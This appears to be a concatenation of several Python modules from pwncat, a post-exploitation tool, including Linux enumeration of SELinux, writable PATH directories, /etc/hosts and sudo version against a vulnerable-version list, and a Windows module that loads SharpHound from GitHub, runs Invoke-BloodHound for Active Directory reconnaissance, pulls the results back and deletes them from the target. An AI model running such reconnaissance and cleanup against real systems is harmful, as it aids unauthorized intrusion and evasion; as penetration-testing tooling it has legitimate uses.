from pwncat.db import Fact
from pwncat.platform.linux import Linux
from pwncat.modules.enumerate import Schedule, EnumerateModule


class SELinuxState(Fact):
    def __init__(self, source, state, status):
        super().__init__(source=source, types=["system.selinux"])

        self.state: str = state
        self.status: Dict[str, str] = status

    def title(self, session):
        result = "SELinux is "
        if self.state == "enabled":
            result += "[red]enabled[/red]"
        elif self.state == "disabled":
            result += "[green]disabled[/green]"
        else:
            result += f"[yellow]{rich.markup.escape(self.state)}[/yellow]"
        return result

    @property
    def mode(self) -> str:
        return self.status.get("Current mode", "unknown").lower()

    @property
    def enabled(self) -> bool:
        return self.state.lower() == "enabled"

    def description(self, session):
        width = max(len(x) for x in self.status) + 1
        return "\n".join(
            f"{key+':':{width}} {value}" for key, value in self.status.items()
        )


class Module(EnumerateModule):
    """
    Retrieve the current SELinux state
    """

    PROVIDES = ["system.selinux"]
    SCHEDULE = Schedule.ONCE
    PLATFORM = [Linux]

    def enumerate(self, session):

        try:
            output = session.platform.run("sestatus", capture_output=True, text=True)
        except (FileNotFoundError, PermissionError):
            return

        if output:
            output = output.stdout.strip()

            status = {}
            for line in output.split("\n"):
                line = line.strip().replace("\t", " ")
                values = " ".join([x for x in line.split(" ") if x != ""]).split(":")
                key = values[0].rstrip(":").strip()
                value = " ".join(values[1:])
                status[key] = value.strip()

            if "SELinux status" in status:
                state = status["SELinux status"]
            else:
                state = "unknown"

            yield SELinuxState(self.name, state, status)



#!/usr/bin/env python3

import rich.markup

from pwncat.db import Fact
from pwncat.platform.linux import Linux
from pwncat.modules.enumerate import Schedule, EnumerateModule


class WritablePath(Fact):
    def __init__(self, source, path):
        super().__init__(source=source, types=["misc.writable_path"])

        self.path: str = path

    def title(self, session):
        return f"""{rich.markup.escape(self.path)}"""


class Module(EnumerateModule):
    """
    Locate any components of the current PATH that are writable
    by the current user.
    """

    PROVIDES = ["system.writable_path"]
    SCHEDULE = Schedule.PER_USER
    PLATFORM = [Linux]

    def enumerate(self, session):

        for path in session.platform.getenv("PATH").split(":"):

            # Ignore empty components
            if path == "":
                continue

            # Find the first item up the path that exists
            path = session.platform.Path(path)
            while not path.exists():
                path = path.parent

            # See if we have write permission
            if path.is_dir() and path.writable():
                yield WritablePath(self.name, str(path.resolve()))



#!/usr/bin/env python3
import pwncat
from pwncat.commands import CommandDefinition


class Command(CommandDefinition):
    """
    Exit the interactive prompt. If sessions are active, you will
    be prompted to confirm. This shouldn't be run from a configuration
    script.
    """

    PROG = "exit"
    ARGS = {}
    LOCAL = True

    def run(self, manager, args):
        raise pwncat.manager.InteractiveExit



#!/usr/bin/env python3
import re
from typing import List

import rich.markup

from pwncat.db import Fact
from pwncat.platform.linux import Linux
from pwncat.modules.enumerate import EnumerateModule


class HostData(Fact):
    def __init__(self, source, address, hostnames):
        super().__init__(source=source, types=["network.host"])

        self.address: str = address
        self.hostnames: List[str] = hostnames

    def title(self, session):
        joined_hostnames = ", ".join((rich.markup.escape(h) for h in self.hostnames))
        return f"[cyan]{rich.markup.escape(self.address)}[/cyan] -> [blue]{joined_hostnames}[/blue]"


class Module(EnumerateModule):
    """
    Enumerate hosts identified in /etc/hosts which are not localhost
    :return:
    """

    PROVIDES = ["network.hosts"]
    PLATFORM = [Linux]

    def enumerate(self, session):

        try:
            with session.platform.open("/etc/hosts", "r") as filp:
                for line in filp:
                    # Remove comments
                    line = re.sub(r"#.*$", "", line).strip()
                    line = line.replace("\t", " ")
                    # We don't care about localhost or localdomain entries
                    if (
                        line.endswith("localhost")
                        or line.endswith(".localdomain")
                        or line.endswith("localhost6")
                        or line.endswith(".localdomain")
                        or line.endswith("localhost4")
                        or line.endswith("localdomain4")
                        or line == ""
                    ):
                        continue
                    address, *hostnames = [e for e in line.split(" ") if e != ""]
                    yield HostData(self.name, address, hostnames)
        except (PermissionError, FileNotFoundError):
            pass



#!/usr/bin/env python3
import shlex
import shutil

import pwncat
from pwncat.modules import Bool, List, Status, Argument, BaseModule, ModuleFailed
from pwncat.platform.windows import Windows, PowershellError


class Module(BaseModule):
    """
    Load the Invoke-BloodHound cmdlet and execute it. Automatically download the
    resulting zip file to a defined location and remove it from the target.
    """

    PLATFORM = [Windows]
    ARGUMENTS = {
        "CollectionMethod": Argument(
            List(str),
            default=None,
            help="Specifies the collection method(s) to be used.",
        ),
        "Stealth": Argument(
            Bool,
            default=None,
            help="Use the stealth collection options (default: false)",
        ),
        "Domain": Argument(
            str,
            default=None,
            help="Specifies the domain to enumerate (default: current)",
        ),
        "WindowsOnly": Argument(
            Bool,
            default=None,
            help="Limits computer collection to systems that have an operatingsystem attribute that matches *Windows",
        ),
        "ZipFilename": Argument(
            str, help="Name for the zip file output by data collection"
        ),
        "NoSaveCache": Argument(
            Bool,
            default=None,
            help="Don't write the cache file to disk. Caching will still be performed in memory.",
        ),
        "EncryptZip": Argument(
            Bool, default=None, help="Encrypt the zip file with a random password"
        ),
        "InvalidateCache": Argument(
            Bool, default=None, help="Invalidate and rebuild the cache file"
        ),
        "SearchBase": Argument(
            str,
            default=None,
            help="DistinguishedName at which to start LDAP searches. Equivalent to the old -Ou option",
        ),
        "LdapFilter": Argument(
            str,
            default=None,
            help="Append this ldap filter to the search filter to further filter the results enumerated",
        ),
        "DomainController": Argument(
            str,
            default=None,
            help="Domain controller to which to connect. Specifying this can result in data loss",
        ),
        "LdapPort": Argument(
            int,
            default=None,
            help="Port LDAP is running on (default: 389/686 for LDAPS)",
        ),
        "SecureLDAP": Argument(
            Bool,
            default=None,
            help="Connect to LDAPS (LDAP SSL) instead of regular LDAP",
        ),
        "DisableKerberosSigning": Argument(
            Bool,
            default=None,
            help="Disables kerberos signing/sealing, making LDAP traffic viewable",
        ),
        "LdapUsername": Argument(
            str,
            default=None,
            help="Username for connecting to LDAP. Use this if you're using a non-domain account for connecting to computers",
        ),
        "LdapPassword": Argument(
            str, default=None, help="Password for connecting to LDAP"
        ),
        "SkipPortScan": Argument(
            Bool, default=None, help="Skip SMB port checks when connecting to computers"
        ),
        "PortScanTimeout": Argument(
            int, default=None, help="Timeout for SMB port checks"
        ),
        "ExcludeDomainControllers": Argument(
            Bool,
            default=None,
            help="Exclude domain controllers from enumeration (useful to avoid Microsoft ATP/ATA)",
        ),
        "Throttle": Argument(
            int, default=None, help="Throttle requests to computers (in milliseconds)"
        ),
        "Jitter": Argument(int, default=None, help="Add jitter to throttle"),
        "OverrideUserName": Argument(
            str, default=None, help="Override username to filter for NetSessionEnum"
        ),
        "NoRegistryLoggedOn": Argument(
            Bool,
            default=None,
            help="Disable remote registry check in LoggedOn collection",
        ),
        "DumpComputerStatus": Argument(
            Bool,
            default=None,
            help="Dumps error codes from attempts to connect to computers",
        ),
        "RealDNSName": Argument(
            str, default=None, help="Overrides the DNS name used for API calls"
        ),
        "CollectAllProperties": Argument(
            Bool, default=None, help="Collect all string LDAP properties on objects"
        ),
        "StatusInterval": Argument(
            int, default=None, help="Interval for displaying status in milliseconds"
        ),
        "Loop": Argument(
            Bool, default=None, help="Perform looping for computer collection"
        ),
        "LoopDuration": Argument(
            str, default=None, help="Duration to perform looping (default: 02:00:00)"
        ),
        "LoopInterval": Argument(
            str,
            default=None,
            help="Interval to sleep between loops (default: 00:05:00)",
        ),
    }
    SHARPHOUND_URL = "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1"

    def run(self, session: "pwncat.manager.Session", **kwargs):

        # First, we need to load BloodHound
        try:
            yield Status("importing Invoke-BloodHound cmdlet")
            session.run("manage.powershell.import", path=self.SHARPHOUND_URL)
        except (ModuleFailed, PowershellError) as exc:
            raise ModuleFailed(f"while importing Invoke-BloodHound: {exc}")

        # Try to create a temporary file. We're just going to delete it, but
        # this gives us a tangible temporary path to put the zip file.
        yield Status("locating a suitable temporary file location")
        with session.platform.tempfile(suffix="zip", mode="w") as filp:
            file_path = filp.name

        path = session.platform.Path(file_path)
        path.unlink()

        # Note the local path to the downloaded zip file and set it to our temp
        # file path we just created/deleted.
        output_path = kwargs["ZipFilename"]
        kwargs["ZipFilename"] = path.parts[-1]
        kwargs["OutputDirectory"] = str(path.parent)

        # Build the arguments
        bloodhound_args = {k: v for k, v in kwargs.items() if v is not None}
        argument_list = ["Invoke-BloodHound"]

        for k, v in bloodhound_args.items():
            if isinstance(v, bool) and v:
                argument_list.append(f"-{k}")
            elif not isinstance(v, bool):
                argument_list.append(f"-{k}")
                argument_list.append(str(v))

        powershell_command = shlex.join(argument_list)

        # Execute BloodHound
        try:
            yield Status("executing bloodhound collector")
            session.platform.powershell(powershell_command)
        except (ModuleFailed, PowershellError) as exc:
            raise ModuleFailed(f"Invoke-BloodHound: {exc}")

        output_name = path.parts[-1]
        path_list = list(path.parent.glob(f"**_{output_name}"))
        if not path_list:
            raise ModuleFailed("unable to find bloodhound output")

        # There should only be one result
        path = path_list[0]

        # Download the contents of the zip file
        try:
            yield Status(f"downloading results to {output_path}")
            with open(output_path, "wb") as dst:
                with path.open("rb") as src:
                    shutil.copyfileobj(src, dst)
        except (FileNotFoundError, PermissionError) as exc:
            if output_path in str(exc):
                try:
                    path.unlink()
                except FileNotFoundError:
                    pass
                raise ModuleFailed(f"permission error: {output_path}") from exc
            raise ModuleFailed("bloodhound failed or access to output was denied")

        # Delete the zip from the target
        yield Status("deleting collected results from target")
        path.unlink()



#!/usr/bin/env python3
import textwrap

import rich.box
from rich.table import Table, Column

import pwncat
from pwncat.util import console
from pwncat.commands import Complete, Parameter, CommandDefinition


class Command(CommandDefinition):
    """
    List known commands and print their associated help documentation.
    """

    def get_command_names(self):
        try:
            # Because we are initialized prior to `manager.parser`,
            # we have to wrap this in a try-except block.
            yield from [cmd.PROG for cmd in self.manager.parser.commands]
        except AttributeError:
            return

    PROG = "help"
    ARGS = {"topic": Parameter(Complete.CHOICES, choices=get_command_names, nargs="?")}
    LOCAL = True

    def run(self, manager: "pwncat.manager.Manager", args):
        if args.topic:
            for command in manager.parser.commands:
                if command.PROG == args.topic:
                    if command.parser is not None:
                        command.parser.print_help()
                    else:
                        console.print(textwrap.dedent(command.__doc__).strip())
                    break
        else:
            table = Table(
                Column("Command", style="green"),
                Column("Description", no_wrap=True),
                box=rich.box.SIMPLE,
            )

            for command in manager.parser.commands:
                doc = command.__doc__
                if doc is None:
                    doc = ""
                else:
                    doc = textwrap.shorten(
                        textwrap.dedent(doc).strip().replace("\n", ""), 60
                    )

                table.add_row(command.PROG, doc)

            console.print(table)



#!/usr/bin/env python3

import pwncat
from pwncat.modules import Status
from pwncat.platform.windows import Windows, PowershellError
from pwncat.modules.enumerate import Schedule, EnumerateModule


class Module(EnumerateModule):
    """Retrieve information on all domain computers"""

    PLATFORM = [Windows]
    PROVIDES = ["domain.fileserver"]
    SCHEDULE = Schedule.ONCE

    def enumerate(self, session: "pwncat.manager.Session"):
        """Perform enumeration"""

        # Check that we are in a domain
        if not session.run("enumerate", types=["domain.details"]):
            return

        # Ensure we have PowerView loaded
        yield Status("loading powersploit recon")
        session.run("powersploit", group="recon")

        try:
            yield Status("requesting domain file servers")
            names = session.platform.powershell("Get-DomainFileServer")[0]
        except (IndexError, PowershellError):
            return

        if not isinstance(names, list):
            names = [names]

        names = [name.lower() for name in names]

        for computer in session.run("enumerate.domain.computer"):
            if computer["name"].lower() in names:
                yield computer



#!/usr/bin/env python3
import re

import rich.markup

from pwncat.db import Fact
from pwncat.subprocess import CalledProcessError
from pwncat.platform.linux import Linux
from pwncat.modules.enumerate import Schedule, EnumerateModule


class SudoVersion(Fact):
    """
    Version of the installed sudo binary may be useful for exploitation

    """

    def __init__(self, source, version, output, vulnerable):
        super().__init__(source=source, types=["software.sudo.version"])

        self.version: str = version
        self.output: str = output
        self.vulnerable: bool = vulnerable

    def title(self, session):
        result = f"[yellow]sudo[/yellow] version [cyan]{rich.markup.escape(self.version)}[/cyan]"
        if self.vulnerable:
            result += " (may be [red]vulnerable[/red])"
        return result

    def description(self, session):
        result = self.output
        if self.vulnerable:
            result = result.rstrip("\n") + "\n\n"
            result += (
                'This version may be vulnerable. Check against "searchsploit sudo"'
            )
        return result


class Module(EnumerateModule):
    """
    Retrieve the version of sudo on the remote host
    """

    PROVIDES = ["software.sudo.version"]
    PLATFORM = [Linux]
    SCHEDULE = Schedule.ONCE

    def enumerate(self, session):
        """
        Enumerate the currently running version of sudo
        :return:
        """

        try:
            # Check the sudo version number
            result = session.platform.run(
                ["sudo", "--version"], capture_output=True, check=True
            )
        except CalledProcessError:
            # Something went wrong with the sudo version
            return

        version = result.stdout.decode("utf-8")

        # Taken from here:
        #   https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
        known_vulnerable = [
            "1.6.8p9",
            "1.6.9p18",
            "1.8.14",
            "1.8.20",
            "1.6.9p21",
            "1.7.2p4",
            "1.8.0",
            "1.8.1",
            "1.8.2",
            "1.8.3",
            "1.4",
            "1.5",
            "1.6",
        ]

        # Can we match this output to a specific sudo version?
        match = re.search(
            r"sudo version ([0-9]+\.[0-9]+\.[^\s]*)", version, re.IGNORECASE
        )
        if match is not None and match.group(1) is not None:
            vulnerable = False
            # Is this in our list of known vulnerable versions? Not a guarantee, but
            # a rough quick check.
            for v in known_vulnerable:
                if match.group(1).startswith(v):
                    vulnerable = True
                    break

            yield SudoVersion(self.name, match.group(1), version, vulnerable)
            return

        # We couldn't parse the version out, but at least give the full version
        # output in the long form/report of enumeration.
        yield SudoVersion(self.name, "unknown", version, False)
